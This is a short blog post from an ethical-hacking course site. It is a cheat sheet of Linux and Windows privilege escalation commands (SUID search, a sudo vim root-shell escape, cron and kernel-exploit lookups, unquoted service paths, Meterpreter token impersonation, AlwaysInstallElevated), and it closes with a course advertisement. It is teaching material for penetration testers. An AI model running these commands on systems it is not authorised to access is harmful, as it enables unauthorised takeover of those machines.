Back to BlogsEthical Hacking

Privilege Escalation Techniques — Linux & Windows

Anuj Singh (Admin) 31 March 2026 1869 views

Privilege Escalation — Low User to Root

After gaining initial access, escalating privileges is the next critical step. Without root/admin, you have limited impact.

Linux Privilege Escalation

SUID Binaries

find / -perm -4000 -type f 2>/dev/null
# Look for: nmap, vim, find, bash, python
# GTFOBins.github.io for exploitation methods

Sudo Misconfigurations

sudo -l
# If you see: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'    # Root shell!

Cron Job Exploitation

cat /etc/crontab
ls -la /etc/cron*
# Find writable scripts executed by root

Kernel Exploits

uname -a
searchsploit linux kernel $(uname -r | cut -d- -f1)

Windows Privilege Escalation

Unquoted Service Paths

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

Token Impersonation

# Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If 1: create malicious MSI → install as SYSTEM

Automated Tools

  • LinPEAS: Linux privilege escalation scanner
  • WinPEAS: Windows privilege escalation scanner
  • PowerUp: PowerShell privesc checker

🔥 Master privilege escalation at ONLY4YOU →

Want to Learn This Practically?

Subscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!

Sign Up & SubscribeRead More Blogs

Continue Learning

← All ArticlesBrowse CoursesAbout ONLY4YOU